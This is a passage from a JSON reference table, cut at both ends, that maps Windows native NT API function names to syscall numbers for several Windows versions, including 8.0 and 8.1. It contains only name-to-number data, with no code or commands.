"NtWaitHighEventPair": "427", "NtWaitLowEventPair": "428"}, "R2": {"NtWorkerFactoryWorkerReady": "0", "NtAcceptConnectPort": "1", "NtMapUserPhysicalPagesScatter": "2", "NtWaitForSingleObject": "3", "NtCallbackReturn": "4", "NtReadFile": "5", "NtDeviceIoControlFile": "6", "NtWriteFile": "7", "NtRemoveIoCompletion": "8", "NtReleaseSemaphore": "9", "NtReplyWaitReceivePort": "10", "NtReplyPort": "11", "NtSetInformationThread": "12", "NtSetEvent": "13", "NtClose": "14", "NtQueryObject": "15", "NtQueryInformationFile": "16", "NtOpenKey": "17", "NtEnumerateValueKey": "18", "NtFindAtom": "19", "NtQueryDefaultLocale": "20", "NtQueryKey": "21", "NtQueryValueKey": "22", "NtAllocateVirtualMemory": "23", "NtQueryInformationProcess": "24", "NtWaitForMultipleObjects32": "25", "NtWriteFileGather": "26", "NtSetInformationProcess": "27", "NtCreateKey": "28", "NtFreeVirtualMemory": "29", "NtImpersonateClientOfPort": "30", "NtReleaseMutant": "31", "NtQueryInformationToken": "32", "NtRequestWaitReplyPort": "33", "NtQueryVirtualMemory": "34", "NtOpenThreadToken": "35", "NtQueryInformationThread": "36", "NtOpenProcess": "37", "NtSetInformationFile": "38", "NtMapViewOfSection": "39", "NtAccessCheckAndAuditAlarm": "40", "NtUnmapViewOfSection": "41", "NtReplyWaitReceivePortEx": "42", "NtTerminateProcess": "43", "NtSetEventBoostPriority": "44", "NtReadFileScatter": "45", "NtOpenThreadTokenEx": "46", "NtOpenProcessTokenEx": "47", "NtQueryPerformanceCounter": "48", "NtEnumerateKey": "49", "NtOpenFile": "50", "NtDelayExecution": "51", "NtQueryDirectoryFile": "52", "NtQuerySystemInformation": "53", "NtOpenSection": "54", "NtQueryTimer": "55", "NtFsControlFile": "56", "NtWriteVirtualMemory": "57", "NtCloseObjectAuditAlarm": "58", "NtDuplicateObject": "59", "NtQueryAttributesFile": "60", "NtClearEvent": "61", "NtReadVirtualMemory": "62", "NtOpenEvent": "63", "NtAdjustPrivilegesToken": "64", "NtDuplicateToken": "65", "NtContinue": "66", "NtQueryDefaultUILanguage": "67", "NtQueueApcThread": "68", "NtYieldExecution": "69", "NtAddAtom": "70", "NtCreateEvent": "71", "NtQueryVolumeInformationFile": "72", "NtCreateSection": "73", "NtFlushBuffersFile": "74", "NtApphelpCacheControl": "75", "NtCreateProcessEx": "76", "NtCreateThread": "77", "NtIsProcessInJob": "78", "NtProtectVirtualMemory": "79", "NtQuerySection": "80", "NtResumeThread": "81", "NtTerminateThread": "82", "NtReadRequestData": "83", "NtCreateFile": "84", "NtQueryEvent": "85", "NtWriteRequestData": "86", "NtOpenDirectoryObject": "87", "NtAccessCheckByTypeAndAuditAlarm": "88", "NtQuerySystemTime": "89", "NtWaitForMultipleObjects": "90", "NtSetInformationObject": "91", "NtCancelIoFile": "92", "NtTraceEvent": "93", "NtPowerInformation": "94", "NtSetValueKey": "95", "NtCancelTimer": "96", "NtSetTimer": "97", "NtAccessCheck": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientOfPort": "129", "NtAlpcOpenSenderProcess": "130", "NtAlpcOpenSenderThread": "131", "NtAlpcQueryInformation": "132", "NtAlpcQueryInformationMessage": "133", "NtAlpcRevokeSecurityContext": "134", "NtAlpcSendWaitReceivePort": "135", "NtAlpcSetInformation": "136", "NtAreMappedFilesTheSame": "137", "NtAssignProcessToJobObject": "138", "NtAssociateWaitCompletionPacket": "139", "NtCancelIoFileEx": "140", "NtCancelSynchronousIoFile": "141", "NtCancelTimer2": "142", "NtCancelWaitCompletionPacket": "143", "NtCommitComplete": "144", "NtCommitEnlistment": "145", "NtCommitTransaction": "146", "NtCompactKeys": "147", "NtCompareTokens": "148", "NtCompleteConnectPort": "149", "NtCompressKey": "150", "NtConnectPort": "151", "NtCreateDebugObject": "152", "NtCreateDirectoryObject": "153", "NtCreateDirectoryObjectEx": "154", "NtCreateEnlistment": "155", "NtCreateEventPair": "156", "NtCreateIRTimer": "157", "NtCreateIoCompletion": "158", "NtCreateJobObject": "159", "NtCreateJobSet": "160", "NtCreateKeyTransacted": "161", "NtCreateKeyedEvent": "162", "NtCreateLowBoxToken": "163", "NtCreateMailslotFile": "164", "NtCreateMutant": "165", "NtCreateNamedPipeFile": "166", "NtCreatePagingFile": "167", "NtCreatePort": "168", "NtCreatePrivateNamespace": "169", "NtCreateProcess": "170", "NtCreateProfile": "171", "NtCreateProfileEx": "172", "NtCreateResourceManager": "173", "NtCreateSemaphore": "174", "NtCreateSymbolicLinkObject": "175", "NtCreateThreadEx": "176", "NtCreateTimer": "177", "NtCreateTimer2": "178", "NtCreateToken": "179", "NtCreateTokenEx": "180", "NtCreateTransaction": "181", "NtCreateTransactionManager": "182", "NtCreateUserProcess": "183", "NtCreateWaitCompletionPacket": "184", "NtCreateWaitablePort": "185", "NtCreateWnfStateName": "186", "NtCreateWorkerFactory": "187", "NtDebugActiveProcess": "188", "NtDebugContinue": "189", "NtDeleteAtom": "190", "NtDeleteBootEntry": "191", "NtDeleteDriverEntry": "192", "NtDeleteFile": "193", "NtDeleteKey": "194", "NtDeleteObjectAuditAlarm": "195", "NtDeletePrivateNamespace": "196", "NtDeleteValueKey": "197", "NtDeleteWnfStateData": "198", "NtDeleteWnfStateName": "199", "NtDisableLastKnownGood": "200", "NtDisplayString": "201", "NtDrawText": "202", "NtEnableLastKnownGood": "203", "NtEnumerateBootEntries": "204", "NtEnumerateDriverEntries": "205", "NtEnumerateSystemEnvironmentValuesEx": "206", "NtEnumerateTransactionObject": "207", "NtExtendSection": "208", "NtFilterBootOption": "209", "NtFilterToken": "210", "NtFilterTokenEx": "211", "NtFlushBuffersFileEx": "212", "NtFlushInstallUILanguage": "213", "NtFlushInstructionCache": "214", "NtFlushKey": "215", "NtFlushProcessWriteBuffers": "216", "NtFlushVirtualMemory": "217", "NtFlushWriteBuffer": "218", "NtFreeUserPhysicalPages": "219", "NtFreezeRegistry": "220", "NtFreezeTransactions": "221", "NtGetCachedSigningLevel": "222", "NtGetCompleteWnfStateSubscription": "223", "NtGetContextThread": "224", "NtGetCurrentProcessorNumber": "225", "NtGetDevicePowerState": "226", "NtGetMUIRegistryInfo": "227", "NtGetNextProcess": "228", "NtGetNextThread": "229", "NtGetNlsSectionPtr": "230", "NtGetNotificationResourceManager": "231", "NtGetWriteWatch": "232", "NtImpersonateAnonymousToken": "233", "NtImpersonateThread": "234", "NtInitializeNlsFiles": "235", "NtInitializeRegistry": "236", "NtInitiatePowerAction": "237", "NtIsSystemResumeAutomatic": "238", "NtIsUILanguageComitted": "239", "NtListenPort": "240", "NtLoadDriver": "241", "NtLoadKey": "242", "NtLoadKey2": "243", "NtLoadKeyEx": "244", "NtLockFile": "245", "NtLockProductActivationKeys": "246", "NtLockRegistryKey": "247", "NtLockVirtualMemory": "248", "NtMakePermanentObject": "249", "NtMakeTemporaryObject": "250", "NtMapCMFModule": "251", "NtMapUserPhysicalPages": "252", "NtModifyBootEntry": "253", "NtModifyDriverEntry": "254", "NtNotifyChangeDirectoryFile": "255", "NtNotifyChangeKey": "256", "NtNotifyChangeMultipleKeys": "257", "NtNotifyChangeSession": "258", "NtOpenEnlistment": "259", "NtOpenEventPair": "260", "NtOpenIoCompletion": "261", "NtOpenJobObject": "262", "NtOpenKeyEx": "263", "NtOpenKeyTransacted": "264", "NtOpenKeyTransactedEx": "265", "NtOpenKeyedEvent": "266", "NtOpenMutant": "267", "NtOpenObjectAuditAlarm": "268", "NtOpenPrivateNamespace": "269", "NtOpenProcessToken": "270", "NtOpenResourceManager": "271", "NtOpenSemaphore": "272", "NtOpenSession": "273", "NtOpenSymbolicLinkObject": "274", "NtOpenThread": "275", "NtOpenTimer": "276", "NtOpenTransaction": "277", "NtOpenTransactionManager": "278", "NtPlugPlayControl": "279", "NtPrePrepareComplete": "280", "NtPrePrepareEnlistment": "281", "NtPrepareComplete": "282", "NtPrepareEnlistment": "283", "NtPrivilegeCheck": "284", "NtPrivilegeObjectAuditAlarm": "285", "NtPrivilegedServiceAuditAlarm": "286", "NtPropagationComplete": "287", "NtPropagationFailed": "288", "NtPulseEvent": "289", "NtQueryBootEntryOrder": "290", "NtQueryBootOptions": "291", "NtQueryDebugFilterState": "292", "NtQueryDirectoryObject": "293", "NtQueryDriverEntryOrder": "294", "NtQueryEaFile": "295", "NtQueryFullAttributesFile": "296", "NtQueryInformationAtom": "297", "NtQueryInformationEnlistment": "298", "NtQueryInformationJobObject": "299", "NtQueryInformationPort": "300", "NtQueryInformationResourceManager": "301", "NtQueryInformationTransaction": "302", "NtQueryInformationTransactionManager": "303", "NtQueryInformationWorkerFactory": "304", "NtQueryInstallUILanguage": "305", "NtQueryIntervalProfile": "306", "NtQueryIoCompletion": "307", "NtQueryLicenseValue": "308", "NtQueryMultipleValueKey": "309", "NtQueryMutant": "310", "NtQueryOpenSubKeys": "311", "NtQueryOpenSubKeysEx": "312", "NtQueryPortInformationProcess": "313", "NtQueryQuotaInformationFile": "314", "NtQuerySecurityAttributesToken": "315", "NtQuerySecurityObject": "316", "NtQuerySemaphore": "317", "NtQuerySymbolicLinkObject": "318", "NtQuerySystemEnvironmentValue": "319", "NtQuerySystemEnvironmentValueEx": "320", "NtQuerySystemInformationEx": "321", "NtQueryTimerResolution": "322", "NtQueryWnfStateData": "323", "NtQueryWnfStateNameInformation": "324", "NtQueueApcThreadEx": "325", "NtRaiseException": "326", "NtRaiseHardError": "327", "NtReadOnlyEnlistment": "328", "NtRecoverEnlistment": "329", "NtRecoverResourceManager": "330", "NtRecoverTransactionManager": "331", "NtRegisterProtocolAddressInformation": "332", "NtRegisterThreadTerminatePort": "333", "NtReleaseKeyedEvent": "334", "NtReleaseWorkerFactoryWorker": "335", "NtRemoveIoCompletionEx": "336", "NtRemoveProcessDebug": "337", "NtRenameKey": "338", "NtRenameTransactionManager": "339", "NtReplaceKey": "340", "NtReplacePartitionUnit": "341", "NtReplyWaitReplyPort": "342", "NtRequestPort": "343", "NtResetEvent": "344", "NtResetWriteWatch": "345", "NtRestoreKey": "346", "NtResumeProcess": "347", "NtRollbackComplete": "348", "NtRollbackEnlistment": "349", "NtRollbackTransaction": "350", "NtRollforwardTransactionManager": "351", "NtSaveKey": "352", "NtSaveKeyEx": "353", "NtSaveMergedKeys": "354", "NtSecureConnectPort": "355", "NtSerializeBoot": "356", "NtSetBootEntryOrder": "357", "NtSetBootOptions": "358", "NtSetCachedSigningLevel": "359", "NtSetContextThread": "360", "NtSetDebugFilterState": "361", "NtSetDefaultHardErrorPort": "362", "NtSetDefaultLocale": "363", "NtSetDefaultUILanguage": "364", "NtSetDriverEntryOrder": "365", "NtSetEaFile": "366", "NtSetHighEventPair": "367", "NtSetHighWaitLowEventPair": "368", "NtSetIRTimer": "369", "NtSetInformationDebugObject": "370", "NtSetInformationEnlistment": "371", "NtSetInformationJobObject": "372", "NtSetInformationKey": "373", "NtSetInformationResourceManager": "374", "NtSetInformationToken": "375", "NtSetInformationTransaction": "376", "NtSetInformationTransactionManager": "377", "NtSetInformationVirtualMemory": "378", "NtSetInformationWorkerFactory": "379", "NtSetIntervalProfile": "380", "NtSetIoCompletion": "381", "NtSetIoCompletionEx": "382", "NtSetLdtEntries": "383", "NtSetLowEventPair": "384", "NtSetLowWaitHighEventPair": "385", "NtSetQuotaInformationFile": "386", "NtSetSecurityObject": "387", "NtSetSystemEnvironmentValue": "388", "NtSetSystemEnvironmentValueEx": "389", "NtSetSystemInformation": "390", "NtSetSystemPowerState": "391", "NtSetSystemTime": "392", "NtSetThreadExecutionState": "393", "NtSetTimer2": "394", "NtSetTimerEx": "395", "NtSetTimerResolution": "396", "NtSetUuidSeed": "397", "NtSetVolumeInformationFile": "398", "NtSetWnfProcessNotificationEvent": "399", "NtShutdownSystem": "400", "NtShutdownWorkerFactory": "401", "NtSignalAndWaitForSingleObject": "402", "NtSinglePhaseReject": "403", "NtStartProfile": "404", "NtStopProfile": "405", "NtSubscribeWnfStateChange": "406", "NtSuspendProcess": "407", "NtSuspendThread": "408", "NtSystemDebugControl": "409", "NtTerminateJobObject": "410", "NtTestAlert": "411", "NtThawRegistry": "412", "NtThawTransactions": "413", "NtTraceControl": "414", "NtTranslateFilePath": "415", "NtUmsThreadYield": "416", "NtUnloadDriver": "417", "NtUnloadKey": "418", "NtUnloadKey2": "419", "NtUnloadKeyEx": "420", "NtUnlockFile": "421", "NtUnlockVirtualMemory": "422", "NtUnmapViewOfSectionEx": "423", "NtUnsubscribeWnfStateChange": "424", "NtUpdateWnfStateData": "425", "NtVdmControl": "426", "NtWaitForAlertByThreadId": "427", "NtWaitForDebugEvent": "428", "NtWaitForKeyedEvent": "429", "NtWaitForWorkViaWorkerFactory": "430", "NtWaitHighEventPair": "431", "NtWaitLowEventPair": "432"}}, "Windows 8": {"8.0": {"NtWorkerFactoryWorkerReady": "0", "NtMapUserPhysicalPagesScatter": "1", "NtWaitForSingleObject": "2", "NtCallbackReturn": "3", "NtReadFile": "4", "NtDeviceIoControlFile": "5", "NtWriteFile": "6", "NtRemoveIoCompletion": "7", "NtReleaseSemaphore": "8", "NtReplyWaitReceivePort": "9", "NtReplyPort": "10", "NtSetInformationThread": "11", "NtSetEvent": "12", "NtClose": "13", "NtQueryObject": "14", "NtQueryInformationFile": "15", "NtOpenKey": "16", "NtEnumerateValueKey": "17", "NtFindAtom": "18", "NtQueryDefaultLocale": "19", "NtQueryKey": "20", "NtQueryValueKey": "21", "NtAllocateVirtualMemory": "22", "NtQueryInformationProcess": "23", "NtWaitForMultipleObjects32": "24", "NtWriteFileGather": "25", "NtSetInformationProcess": "26", "NtCreateKey": "27", "NtFreeVirtualMemory": "28", "NtImpersonateClientOfPort": "29", "NtReleaseMutant": "30", "NtQueryInformationToken": "31", "NtRequestWaitReplyPort": "32", "NtQueryVirtualMemory": "33", "NtOpenThreadToken": "34", "NtQueryInformationThread": "35", "NtOpenProcess": "36", "NtSetInformationFile": "37", "NtMapViewOfSection": "38", "NtAccessCheckAndAuditAlarm": "39", "NtUnmapViewOfSection": "40", "NtReplyWaitReceivePortEx": "41", "NtTerminateProcess": "42", "NtSetEventBoostPriority": "43", "NtReadFileScatter": "44", "NtOpenThreadTokenEx": "45", "NtOpenProcessTokenEx": "46", "NtQueryPerformanceCounter": "47", "NtEnumerateKey": "48", "NtOpenFile": "49", "NtDelayExecution": "50", "NtQueryDirectoryFile": "51", "NtQuerySystemInformation": "52", "NtOpenSection": "53", "NtQueryTimer": "54", "NtFsControlFile": "55", "NtWriteVirtualMemory": "56", "NtCloseObjectAuditAlarm": "57", "NtDuplicateObject": "58", "NtQueryAttributesFile": "59", "NtClearEvent": "60", "NtReadVirtualMemory": "61", "NtOpenEvent": "62", "NtAdjustPrivilegesToken": "63", "NtDuplicateToken": "64", "NtContinue": "65", "NtQueryDefaultUILanguage": "66", "NtQueueApcThread": "67", "NtYieldExecution": "68", "NtAddAtom": "69", "NtCreateEvent": "70", "NtQueryVolumeInformationFile": "71", "NtCreateSection": "72", "NtFlushBuffersFile": "73", "NtApphelpCacheControl": "74", "NtCreateProcessEx": "75", "NtCreateThread": "76", "NtIsProcessInJob": "77", "NtProtectVirtualMemory": "78", "NtQuerySection": "79", "NtResumeThread": "80", "NtTerminateThread": "81", "NtReadRequestData": "82", "NtCreateFile": "83", "NtQueryEvent": "84", "NtWriteRequestData": "85", "NtOpenDirectoryObject": "86", "NtAccessCheckByTypeAndAuditAlarm": "87", "NtQuerySystemTime": "88", "NtWaitForMultipleObjects": "89", "NtSetInformationObject": "90", "NtCancelIoFile": "91", "NtTraceEvent": "92", "NtPowerInformation": "93", "NtSetValueKey": "94", "NtCancelTimer": "95", "NtSetTimer": "96", "NtAcceptConnectPort": "97", "NtAccessCheck": "98", "NtAccessCheckByType": "99", "NtAccessCheckByTypeResultList": "100", "NtAccessCheckByTypeResultListAndAuditAlarm": "101", "NtAccessCheckByTypeResultListAndAuditAlarmByHandle": "102", "NtAddAtomEx": "103", "NtAddBootEntry": "104", "NtAddDriverEntry": "105", "NtAdjustGroupsToken": "106", "NtAdjustTokenClaimsAndDeviceGroups": "107", "NtAlertResumeThread": "108", "NtAlertThread": "109", "NtAlertThreadByThreadId": "110", "NtAllocateLocallyUniqueId": "111", "NtAllocateReserveObject": "112", "NtAllocateUserPhysicalPages": "113", "NtAllocateUuids": "114", "NtAlpcAcceptConnectPort": "115", "NtAlpcCancelMessage": "116", "NtAlpcConnectPort": "117", "NtAlpcConnectPortEx": "118", "NtAlpcCreatePort": "119", "NtAlpcCreatePortSection": "120", "NtAlpcCreateResourceReserve": "121", "NtAlpcCreateSectionView": "122", "NtAlpcCreateSecurityContext": "123", "NtAlpcDeletePortSection": "124", "NtAlpcDeleteResourceReserve": "125", "NtAlpcDeleteSectionView": "126", "NtAlpcDeleteSecurityContext": "127", "NtAlpcDisconnectPort": "128", "NtAlpcImpersonateClientOfPort": "129", "NtAlpcOpenSenderProcess": "130", "NtAlpcOpenSenderThread": "131", "NtAlpcQueryInformation": "132", "NtAlpcQueryInformationMessage": "133", "NtAlpcRevokeSecurityContext": "134", "NtAlpcSendWaitReceivePort": "135", "NtAlpcSetInformation": "136", "NtAreMappedFilesTheSame": "137", "NtAssignProcessToJobObject": "138", "NtAssociateWaitCompletionPacket": "139", "NtCancelIoFileEx": "140", "NtCancelSynchronousIoFile": "141", "NtCancelWaitCompletionPacket": "142", "NtCommitComplete": "143", "NtCommitEnlistment": "144", "NtCommitTransaction": "145", "NtCompactKeys": "146", "NtCompareTokens": "147", "NtCompleteConnectPort": "148", "NtCompressKey": "149", "NtConnectPort": "150", "NtCreateDebugObject": "151", "NtCreateDirectoryObject": "152", "NtCreateDirectoryObjectEx": "153", "NtCreateEnlistment": "154", "NtCreateEventPair": "155", "NtCreateIRTimer": "156", "NtCreateIoCompletion": "157", "NtCreateJobObject": "158", "NtCreateJobSet": "159", "NtCreateKeyTransacted": "160", "NtCreateKeyedEvent": "161", "NtCreateLowBoxToken": "162", "NtCreateMailslotFile": "163", "NtCreateMutant": "164", "NtCreateNamedPipeFile": "165", "NtCreatePagingFile": "166", "NtCreatePort": "167", "NtCreatePrivateNamespace": "168", "NtCreateProcess": "169", "NtCreateProfile": "170", "NtCreateProfileEx": "171", "NtCreateResourceManager": "172", "NtCreateSemaphore": "173", "NtCreateSymbolicLinkObject": "174", "NtCreateThreadEx": "175", "NtCreateTimer": "176", "NtCreateToken": "177", "NtCreateTokenEx": "178", "NtCreateTransaction": "179", "NtCreateTransactionManager": "180", "NtCreateUserProcess": "181", "NtCreateWaitCompletionPacket": "182", "NtCreateWaitablePort": "183", "NtCreateWnfStateName": "184", "NtCreateWorkerFactory": "185", "NtDebugActiveProcess": "186", "NtDebugContinue": "187", "NtDeleteAtom": "188", "NtDeleteBootEntry": "189", "NtDeleteDriverEntry": "190", "NtDeleteFile": "191", "NtDeleteKey": "192", "NtDeleteObjectAuditAlarm": "193", "NtDeletePrivateNamespace": "194", "NtDeleteValueKey": "195", "NtDeleteWnfStateData": "196", "NtDeleteWnfStateName": "197", "NtDisableLastKnownGood": "198", "NtDisplayString": "199", "NtDrawText": "200", "NtEnableLastKnownGood": "201", "NtEnumerateBootEntries": "202", "NtEnumerateDriverEntries": "203", "NtEnumerateSystemEnvironmentValuesEx": "204", "NtEnumerateTransactionObject": "205", "NtExtendSection": "206", "NtFilterBootOption": "207", "NtFilterToken": "208", "NtFilterTokenEx": "209", "NtFlushBuffersFileEx": "210", "NtFlushInstallUILanguage": "211", "NtFlushInstructionCache": "212", "NtFlushKey": "213", "NtFlushProcessWriteBuffers": "214", "NtFlushVirtualMemory": "215", "NtFlushWriteBuffer": "216", "NtFreeUserPhysicalPages": "217", "NtFreezeRegistry": "218", "NtFreezeTransactions": "219", "NtGetCachedSigningLevel": "220", "NtGetContextThread": "221", "NtGetCurrentProcessorNumber": "222", "NtGetDevicePowerState": "223", "NtGetMUIRegistryInfo": "224", "NtGetNextProcess": "225", "NtGetNextThread": "226", "NtGetNlsSectionPtr": "227", "NtGetNotificationResourceManager": "228", "NtGetWriteWatch": "229", "NtImpersonateAnonymousToken": "230", "NtImpersonateThread": "231", "NtInitializeNlsFiles": "232", "NtInitializeRegistry": "233", "NtInitiatePowerAction": "234", "NtIsSystemResumeAutomatic": "235", "NtIsUILanguageComitted": "236", "NtListenPort": "237", "NtLoadDriver": "238", "NtLoadKey": "239", "NtLoadKey2": "240", "NtLoadKeyEx": "241", "NtLockFile": "242", "NtLockProductActivationKeys": "243", "NtLockRegistryKey": "244", "NtLockVirtualMemory": "245", "NtMakePermanentObject": "246", "NtMakeTemporaryObject": "247", "NtMapCMFModule": "248", "NtMapUserPhysicalPages": "249", "NtModifyBootEntry": "250", "NtModifyDriverEntry": "251", "NtNotifyChangeDirectoryFile": "252", "NtNotifyChangeKey": "253", "NtNotifyChangeMultipleKeys": "254", "NtNotifyChangeSession": "255", "NtOpenEnlistment": "256", "NtOpenEventPair": "257", "NtOpenIoCompletion": "258", "NtOpenJobObject": "259", "NtOpenKeyEx": "260", "NtOpenKeyTransacted": "261", "NtOpenKeyTransactedEx": "262", "NtOpenKeyedEvent": "263", "NtOpenMutant": "264", "NtOpenObjectAuditAlarm": "265", "NtOpenPrivateNamespace": "266", "NtOpenProcessToken": "267", "NtOpenResourceManager": "268", "NtOpenSemaphore": "269", "NtOpenSession": "270", "NtOpenSymbolicLinkObject": "271", "NtOpenThread": "272", "NtOpenTimer": "273", "NtOpenTransaction": "274", "NtOpenTransactionManager": "275", "NtPlugPlayControl": "276", "NtPrePrepareComplete": "277", "NtPrePrepareEnlistment": "278", "NtPrepareComplete": "279", "NtPrepareEnlistment": "280", "NtPrivilegeCheck": "281", "NtPrivilegeObjectAuditAlarm": "282", "NtPrivilegedServiceAuditAlarm": "283", "NtPropagationComplete": "284", "NtPropagationFailed": "285", "NtPulseEvent": "286", "NtQueryBootEntryOrder": "287", "NtQueryBootOptions": "288", "NtQueryDebugFilterState": "289", "NtQueryDirectoryObject": "290", "NtQueryDriverEntryOrder": "291", "NtQueryEaFile": "292", "NtQueryFullAttributesFile": "293", "NtQueryInformationAtom": "294", "NtQueryInformationEnlistment": "295", "NtQueryInformationJobObject": "296", "NtQueryInformationPort": "297", "NtQueryInformationResourceManager": "298", "NtQueryInformationTransaction": "299", "NtQueryInformationTransactionManager": "300", "NtQueryInformationWorkerFactory": "301", "NtQueryInstallUILanguage": "302", "NtQueryIntervalProfile": "303", "NtQueryIoCompletion": "304", "NtQueryLicenseValue": "305", "NtQueryMultipleValueKey": "306", "NtQueryMutant": "307", "NtQueryOpenSubKeys": "308", "NtQueryOpenSubKeysEx": "309", "NtQueryPortInformationProcess": "310", "NtQueryQuotaInformationFile": "311", "NtQuerySecurityAttributesToken": "312", "NtQuerySecurityObject": "313", "NtQuerySemaphore": "314", "NtQuerySymbolicLinkObject": "315", "NtQuerySystemEnvironmentValue": "316", "NtQuerySystemEnvironmentValueEx": "317", "NtQuerySystemInformationEx": "318", "NtQueryTimerResolution": "319", "NtQueryWnfStateData": "320", "NtQueryWnfStateNameInformation": "321", "NtQueueApcThreadEx": "322", "NtRaiseException": "323", "NtRaiseHardError": "324", "NtReadOnlyEnlistment": "325", "NtRecoverEnlistment": "326", "NtRecoverResourceManager": "327", "NtRecoverTransactionManager": "328", "NtRegisterProtocolAddressInformation": "329", "NtRegisterThreadTerminatePort": "330", "NtReleaseKeyedEvent": "331", "NtReleaseWorkerFactoryWorker": "332", "NtRemoveIoCompletionEx": "333", "NtRemoveProcessDebug": "334", "NtRenameKey": "335", "NtRenameTransactionManager": "336", "NtReplaceKey": "337", "NtReplacePartitionUnit": "338", "NtReplyWaitReplyPort": "339", "NtRequestPort": "340", "NtResetEvent": "341", "NtResetWriteWatch": "342", "NtRestoreKey": "343", "NtResumeProcess": "344", "NtRollbackComplete": "345", "NtRollbackEnlistment": "346", "NtRollbackTransaction": "347", "NtRollforwardTransactionManager": "348", "NtSaveKey": "349", "NtSaveKeyEx": "350", "NtSaveMergedKeys": "351", "NtSecureConnectPort": "352", "NtSerializeBoot": "353", "NtSetBootEntryOrder": "354", "NtSetBootOptions": "355", "NtSetCachedSigningLevel": "356", "NtSetContextThread": "357", "NtSetDebugFilterState": "358", "NtSetDefaultHardErrorPort": "359", "NtSetDefaultLocale": "360", "NtSetDefaultUILanguage": "361", "NtSetDriverEntryOrder": "362", "NtSetEaFile": "363", "NtSetHighEventPair": "364", "NtSetHighWaitLowEventPair": "365", "NtSetIRTimer": "366", "NtSetInformationDebugObject": "367", "NtSetInformationEnlistment": "368", "NtSetInformationJobObject": "369", "NtSetInformationKey": "370", "NtSetInformationResourceManager": "371", "NtSetInformationToken": "372", "NtSetInformationTransaction": "373", "NtSetInformationTransactionManager": "374", "NtSetInformationVirtualMemory": "375", "NtSetInformationWorkerFactory": "376", "NtSetIntervalProfile": "377", "NtSetIoCompletion": "378", "NtSetIoCompletionEx": "379", "NtSetLdtEntries": "380", "NtSetLowEventPair": "381", "NtSetLowWaitHighEventPair": "382", "NtSetQuotaInformationFile": "383", "NtSetSecurityObject": "384", "NtSetSystemEnvironmentValue": "385", "NtSetSystemEnvironmentValueEx": "386", "NtSetSystemInformation": "387", "NtSetSystemPowerState": "388", "NtSetSystemTime": "389", "NtSetThreadExecutionState": "390", "NtSetTimerEx": "391", "NtSetTimerResolution": "392", "NtSetUuidSeed": "393", "NtSetVolumeInformationFile": "394", "NtShutdownSystem": "395", "NtShutdownWorkerFactory": "396", "NtSignalAndWaitForSingleObject": "397", "NtSinglePhaseReject": "398", "NtStartProfile": "399", "NtStopProfile": "400", "NtSubscribeWnfStateChange": "401", "NtSuspendProcess": "402", "NtSuspendThread": "403", "NtSystemDebugControl": "404", "NtTerminateJobObject": "405", "NtTestAlert": "406", "NtThawRegistry": "407", "NtThawTransactions": "408", "NtTraceControl": "409", "NtTranslateFilePath": "410", "NtUmsThreadYield": "411", "NtUnloadDriver": "412", "NtUnloadKey": "413", "NtUnloadKey2": "414", "NtUnloadKeyEx": "415", "NtUnlockFile": "416", "NtUnlockVirtualMemory": "417", "NtUnmapViewOfSectionEx": "418", "NtUnsubscribeWnfStateChange": "419", "NtUpdateWnfStateData": "420", "NtVdmControl": "421", "NtWaitForAlertByThreadId": "422", "NtWaitForDebugEvent": "423", "NtWaitForKeyedEvent": "424", "NtWaitForWnfNotifications": "425", "NtWaitForWorkViaWorkerFactory": "426", "NtWaitHighEventPair": "427", "NtWaitLowEventPair": "428"}, "8.1": {"NtWorkerFactoryWorkerReady": "0", "NtAcceptConnectPort": "1", "NtMapUserPhysicalPagesScatter": "2", "NtWaitForSingleObject": "3", "NtCallbackReturn": "4", "NtReadFile": "5", "NtDeviceIoControlFile": "6", "NtWriteFile": "7", "NtRemoveIoCompletion": "8", "NtReleaseSemaphore": "9", "NtReplyWaitReceivePort": "10", "NtReplyPort": "11", "NtSetInformationThread": "12", "NtSetEvent": "13", "NtClose": "14", "NtQueryObject": "15", "NtQueryInformationFile": "16", "NtOpenKey": "17", "NtEnumerateValueKey": "18", "NtFindAtom": "19", "NtQueryDefaultLocale": "20", "NtQueryKey": "21", "NtQueryValueKey": "22", "NtAllocateVirtualMemory": "23", "NtQueryInformationProcess": "24", "NtWaitForMultipleObjects32": "25", "NtWriteFileGather": "26", "NtSetInformationProcess": "27", "NtCreateKey": "28", "NtFreeVirtualMemory": "29", "NtImpersonateClientOfPort": "30", "NtReleaseMutant": "31", "NtQueryInformationToken": "32", "NtRequestWaitReplyPort": "33", "NtQueryVirtualMemory": "34", "NtOpenThreadToken": "35", "NtQueryInformationThread": "36", "NtOpenProcess": "37", "NtSetInformationFile": "38", "NtMapViewOfSection": "39", "NtAccessCheckAndAuditAlarm": "40", "NtUnmapViewOfSection": "41", "NtReplyWaitReceivePortEx": "42", "NtTerminateProcess": "43", "NtSetEventBoostPriority": "44", "NtReadFileScatter": "45", "NtOpenThreadTokenEx": "46", "NtOpenProcessTokenEx": "47", "NtQueryPerformanceCounter": "48", "NtEnumerateKey": "49", "NtOpenFile": "50", "NtDelayExecution": "51", "NtQueryDirectoryFile": "52", "NtQuerySystemInformation": "53", "NtOpenSection": "54", "NtQueryTimer": "55", "NtFsControlFile": "56", "NtWriteVirtualMemory": "57", "NtCloseObjectAuditAlarm": "58", "NtDuplicateObject": "59", "NtQueryAttributesFile": "60", "NtClearEvent": "61", "NtReadVirtualMemory": "62", "NtOpenEvent": "63", "NtAdjustPrivilegesToken": "64", "NtDuplicateToken": "65", "NtContinue": "66", "NtQueryDefaultUILanguage": "67", "NtQueueApcThread": "68", 